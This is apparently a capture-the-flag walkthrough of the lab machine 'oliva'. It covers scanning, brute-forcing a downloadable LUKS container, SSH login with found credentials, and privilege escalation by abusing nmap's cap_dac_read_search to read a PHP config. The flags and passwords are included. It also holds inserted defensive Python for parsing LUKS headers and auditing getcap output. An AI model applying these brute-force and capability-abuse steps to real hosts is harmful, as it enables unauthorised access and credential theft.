
oliva-bruteforce-luks

oliva: cracking an easy LUKS v2 container, using bruteforce-luks, using cryptsetup, cap_dac_read_search=eip, using mysql

Host discovery

┌──(kali㉿kali)-[~/桌面/OSCP]
└─$ sudo netdiscover -i eth0 -r 192.168.44.148/24

Service scan

┌──(kali㉿kali)-[~/桌面/OSCP]
└─$ sudo nmap -sV -A -T 4 -p- 192.168.44.148 

Ports 22 and 80 are open. Visiting the HTTP home page and clicking CLICK! automatically downloads a file named oliva.

LUKS v2 encrypted file

file identifies it as a LUKS v2 encrypted file:

┌──(kali㉿kali)-[~/下载]
└─$ file oliva
oliva: LUKS encrypted file, ver 2, header size 16384, ID 3, algo sha256, salt 0x14fa423af24634e8..., UUID: 9a391896-2dd5-4f2c-84cf-1ba6e4e0577e, crc 0x6118d2d9b595355f..., at 0x1000 {"keyslots":{"0":{"type":"luks2","key_size":64,"af":{"type":"luks1","stripes":4000,"hash":"sha256"},"area":{"type":"raw","offse
┌──(kali㉿kali)-[~/下载]
└─$ sudo apt install bruteforce-luks

The dictionary attack ran through roughly 970 candidates before reporting:

Password found: bebita
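The `file` output above exposes the LUKS2 header in the clear, and the brute force succeeds only because the passphrase is a dictionary word. The following is an added example (not code from the write-up) that parses a LUKS2 header the way `file` does, verifies the header checksum, and reports how costly each keyslot's KDF makes offline guessing. The header layout follows the LUKS2 on-disk format (a 4096-byte big-endian binary header followed by a JSON area); the sample container, its UUID and the risk thresholds in `assess_keyslot()` are this example's own constructions, not values from the page.

```python
"""Parse a LUKS2 header and report how costly each keyslot is to guess offline.

Added example, not code from the original write-up. The sample container built
by build_sample_container() is constructed in memory so the script runs offline.
"""
import hashlib
import json
import struct

LUKS2_MAGIC = b"LUKS\xba\xbe"
# magic, version, hdr_size, seqid, label, checksum_alg, salt, uuid, subsystem,
# hdr_offset, padding, csum, padding up to 4096 bytes (all big-endian)
BIN_HDR = struct.Struct(">6sHQQ48s32s64s40s48sQ184s64s3584s")
CSUM_OFFSET = 448  # byte offset of the 64-byte csum field inside the binary header


def _cstr(raw: bytes) -> str:
    return raw.split(b"\x00", 1)[0].decode("ascii", "replace")


def is_luks2(blob: bytes) -> bool:
    return len(blob) >= BIN_HDR.size and blob.startswith(LUKS2_MAGIC)


def parse_luks2_header(blob: bytes) -> dict:
    """Return header fields, checksum status and the KDF parameters of every keyslot."""
    if not is_luks2(blob):
        raise ValueError("not a LUKS2 header")
    (_magic, version, hdr_size, seqid, _label, csum_alg, _salt, uuid,
     _subsys, _hdr_off, _pad, csum, _pad2) = BIN_HDR.unpack_from(blob, 0)
    if version != 2 or len(blob) < hdr_size:
        raise ValueError("unsupported version or truncated header")
    alg = _cstr(csum_alg)
    # The checksum covers the binary header with csum zeroed, followed by the JSON area.
    zeroed = blob[:CSUM_OFFSET] + b"\x00" * 64 + blob[CSUM_OFFSET + 64:hdr_size]
    digest = hashlib.new(alg, zeroed).digest()
    meta = json.loads(blob[BIN_HDR.size:hdr_size].split(b"\x00", 1)[0])
    keyslots = []
    for slot_id, slot in sorted(meta.get("keyslots", {}).items(), key=lambda kv: int(kv[0])):
        kdf = slot.get("kdf", {})
        keyslots.append({
            "id": int(slot_id),
            "kdf": kdf.get("type"),
            "iterations": kdf.get("iterations"),  # pbkdf2 only
            "memory_kib": kdf.get("memory"),      # argon2 only
            "af_hash": slot.get("af", {}).get("hash"),
        })
    return {"version": version, "hdr_size": hdr_size, "seqid": seqid, "uuid": _cstr(uuid),
            "checksum_alg": alg, "checksum_ok": csum[:len(digest)] == digest,
            "keyslots": keyslots}


def assess_keyslot(slot: dict) -> str:
    """Rule of thumb (this example's own): PBKDF2 is cheap per guess, Argon2 with a
    large memory cost is not. A dictionary passphrase falls either way."""
    if slot["kdf"] == "pbkdf2":
        return "weak" if (slot["iterations"] or 0) < 1_000_000 else "moderate"
    if slot["kdf"] in ("argon2i", "argon2id"):
        return "strong" if (slot["memory_kib"] or 0) >= 256 * 1024 else "moderate"
    return "unknown"


def build_sample_container(kdf: dict) -> bytes:
    """Construct a minimal LUKS2 header in memory (sample data, not the write-up's file)."""
    hdr_size = 16384
    meta = {"keyslots": {"0": {"type": "luks2", "key_size": 64,
                               "af": {"type": "luks1", "stripes": 4000, "hash": "sha256"},
                               "area": {"type": "raw", "offset": "32768", "size": "258048",
                                        "encryption": "aes-xts-plain64", "key_size": 64},
                               "kdf": kdf}},
            "tokens": {}, "segments": {}, "digests": {},
            "config": {"json_size": str(hdr_size - BIN_HDR.size), "keyslots_size": "16744448"}}
    json_area = json.dumps(meta).encode().ljust(hdr_size - BIN_HDR.size, b"\x00")
    fields = [LUKS2_MAGIC, 2, hdr_size, 3, b"", b"sha256", b"\x11" * 64,
              b"00000000-0000-4000-8000-000000000000", b"", 0, b"", b"\x00" * 64, b""]
    # Checksum is taken with the csum field zeroed, then written into it.
    fields[11] = hashlib.sha256(BIN_HDR.pack(*fields) + json_area).digest()
    return BIN_HDR.pack(*fields) + json_area


if __name__ == "__main__":
    for kdf in ({"type": "pbkdf2", "hash": "sha256", "iterations": 1000, "salt": "AA=="},
                {"type": "argon2id", "time": 4, "memory": 1048576, "cpus": 4, "salt": "AA=="}):
        hdr = parse_luks2_header(build_sample_container(kdf))
        for slot in hdr["keyslots"]:
            print(hdr["uuid"], "checksum ok" if hdr["checksum_ok"] else "CHECKSUM MISMATCH",
                  f"slot {slot['id']}: {slot['kdf']} -> {assess_keyslot(slot)}")
```

To inspect a real container, read its first 16 KiB (the `hdr_size` shown by `file`) and pass the bytes to `parse_luks2_header()`. The takeaway for a defender is that the KDF only raises the cost per guess; a container that can be downloaded from a web server and is protected by a word like the one above is lost regardless of the KDF.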

With the passphrase recovered, we use cryptsetup to open the container:

┌──(kali㉿kali)-[~/下载]
└─$ sudo cryptsetup luksOpen oliva olia_img
输入 oliva 的口令: bebita

Once opened, the mapped device is created at /dev/mapper/olive_img, and we can mount it with the mount command:

mount  /dev/mapper/olive_img /mnt

Alternatively, open it from the file manager:

cryptsetup open --type luks oliva oliva

Inside the mounted volume there is a password file:

┌──(kali㉿kali)-[/media/kali/7839beec-705e-45c5-a982-3096ac116f6e]
└─$ cat mypass.txt 
Yesthatsmypass!

Try the credentials over SSH

┌──(kali㉿kali)-[~/桌面/OSCP]
└─$ ssh oliva@192.168.44.148
// user: oliva
// password: Yesthatsmypass!
oliva@oliva:~$ cat user.txt
HMVY0H8NgGJqbFzbgo0VMRm

Privilege escalation

getcap is the Linux tool for listing the file capabilities set on binaries.

oliva@oliva:~$ /usr/sbin/getcap -r / 2>/dev/null
/usr/bin/nmap cap_dac_read_search=eip
/usr/bin/ping cap_net_raw=ep

The linpeas.sh enumeration script flags this as well.
cap_dac_read_search=eip is a file capability: CAP_DAC_READ_SEARCH bypasses the discretionary access control (DAC) checks for reading files and searching directories, that is, the owner/group/other permission bits, and the e flag makes it effective as soon as the binary runs. Below we use nmap to read the following file and obtain the mysql credentials; the file claims they are the root password, but logging in with them fails.

nmap localhost -iL index.php

-iL <file> tells nmap to batch-scan the target addresses listed in a file (1.txt in the generic usage). Because nmap carries cap_dac_read_search, it can read files the oliva user cannot, and it prints every token it fails to resolve as a host name.
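The getcap listing above is exactly what a host-hardening check should be looking at. The following is an added example (not code from the write-up) that parses `getcap -r /` output in both the current and the older libcap formats and flags capabilities that, when effective on a binary any user can run, defeat file permission checks or lead directly to root. The sample output is constructed: the nmap and ping lines mirror what the write-up shows, the other two paths are made up.

```python
"""Audit `getcap -r /` output for file capabilities that bypass file permissions.

Added example, not part of the original write-up. Feed it the output of
`/usr/sbin/getcap -r / 2>/dev/null`; the embedded sample is constructed.
"""
import re
import sys

# Capabilities worth a finding when set on a file. Values are short reasons.
HIGH_RISK = {
    "cap_dac_read_search": "reads any file and searches any directory regardless of mode bits",
    "cap_dac_override": "bypasses read/write/execute permission checks",
    "cap_sys_admin": "broad administrative operations (mounts, namespaces, ...)",
    "cap_sys_ptrace": "can attach to and read memory of other users' processes",
    "cap_setuid": "can change UID, including to 0",
    "cap_setgid": "can change GID",
    "cap_sys_module": "can load kernel modules",
    "cap_chown": "can change file ownership",
    "cap_fowner": "bypasses owner checks on chmod and similar",
    "cap_sys_rawio": "raw device I/O",
}

# Two getcap output styles: "path cap_a,cap_b=eip" (libcap >= 2.41) and
# "path = cap_a,cap_b+eip" (older libcap).
_LINE_RE = re.compile(r"^(?P<path>\S+)\s+=?\s*(?P<caps>[a-z_0-9,]+)\s*[=+](?P<flags>[eip]+)\s*$")


def parse_getcap_line(line: str):
    """Return (path, [capabilities], {flags}) or None if the line is not a getcap entry."""
    m = _LINE_RE.match(line.strip())
    if not m:
        return None
    return m["path"], m["caps"].split(","), set(m["flags"])


def audit_capabilities(lines):
    """Return one finding dict per risky capability, in the order encountered."""
    findings = []
    for line in lines:
        parsed = parse_getcap_line(line)
        if not parsed:
            continue
        path, caps, flags = parsed
        for cap in caps:
            if cap not in HIGH_RISK:
                continue
            # 'e' raises the capability at exec for programs that are not
            # capability-aware (nmap in the write-up); with only 'p' the program
            # has to raise it itself, which still deserves review.
            severity = "high" if "e" in flags else "medium"
            findings.append({"path": path, "capability": cap,
                             "flags": "".join(sorted(flags)),
                             "severity": severity, "reason": HIGH_RISK[cap]})
    return findings


# Constructed sample: first two lines mirror the write-up, the rest are made up.
SAMPLE_GETCAP_OUTPUT = """\
/usr/bin/nmap cap_dac_read_search=eip
/usr/bin/ping cap_net_raw=ep
/usr/local/bin/backup-tool = cap_dac_override+p
/usr/sbin/httpd cap_net_bind_service=ep
"""

if __name__ == "__main__":
    # Usage: getcap -r / 2>/dev/null | python3 audit_caps.py   (or run without input for the sample)
    source = sys.stdin.read().splitlines() if not sys.stdin.isatty() else SAMPLE_GETCAP_OUTPUT.splitlines()
    for f in audit_capabilities(source):
        print(f"[{f['severity']}] {f['path']}: {f['capability']} ({f['flags']}) - {f['reason']}")
```

cap_net_raw on ping and cap_net_bind_service on a web server are the normal, narrowly scoped use of file capabilities and produce no finding; a scanner or any other general-purpose binary with cap_dac_read_search effective is a root-equivalent file read for every local user. The fix is `setcap -r /usr/bin/nmap` (remove the capability) and, if raw sockets are really needed, grant only cap_net_raw.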

We guess the database password is Savingmypass:

oliva@oliva:/var/www/html$ nmap localhost -iL index.php
Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-22 14:46 CEST
Failed to resolve "Hi".
Failed to resolve "oliva,".
Failed to resolve "Here".
Failed to resolve "the".
Failed to resolve "pass".
Failed to resolve "to".
Failed to resolve "obtain".
Failed to resolve "root:".
Failed to resolve "<?php".
Failed to resolve "$dbname".
Failed to resolve "=".
Failed to resolve "'easy';".
Failed to resolve "$dbuser".
Failed to resolve "=".
Failed to resolve "'root';".
Failed to resolve "$dbpass".
Failed to resolve "=".
Failed to resolve "'Savingmypass';".
Failed to resolve "$dbhost".
Failed to resolve "=".
Failed to resolve "'localhost';".
Failed to resolve "?>".
Failed to resolve "<a".
Unable to split netmask from target expression: "href="oliva">CLICK!</a>"
WARNING: No targets were specified, so 0 hosts scanned.
Nmap done: 0 IP addresses (0 hosts up) scanned in 29.96 seconds

Log in to the database

oliva@oliva:/var/www/html$ mysql -u root -pSavingmypass
Enter password:
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 5
Server version: 10.11.3-MariaDB-1 Debian 12
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| easy               |
| information_schema |
| mysql              |
| performance_schema |
| sys                |
+--------------------+
5 rows in set (0,005 sec)
MariaDB [(none)]> use easy
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [easy]> show tables;
+----------------+
| Tables_in_easy |
+----------------+
| logging        |
+----------------+
1 row in set (0,000 sec)
MariaDB [easy]> select * from logging
    -> ;
+--------+------+--------------+
| id_log | uzer | pazz         |
+--------+------+--------------+
|      1 | root | OhItwasEasy! |
+--------+------+--------------+
1 row in set (0,003 sec)
MariaDB [easy]>
oliva@oliva:/var/www/html$ su root
Contraseña: // OhItwasEasy!
root@oliva:~# cat rutflag.txt
HMVnuTkm4MwFQNPmMJHRyW7
http://www.lryc.cn/news/383566.html
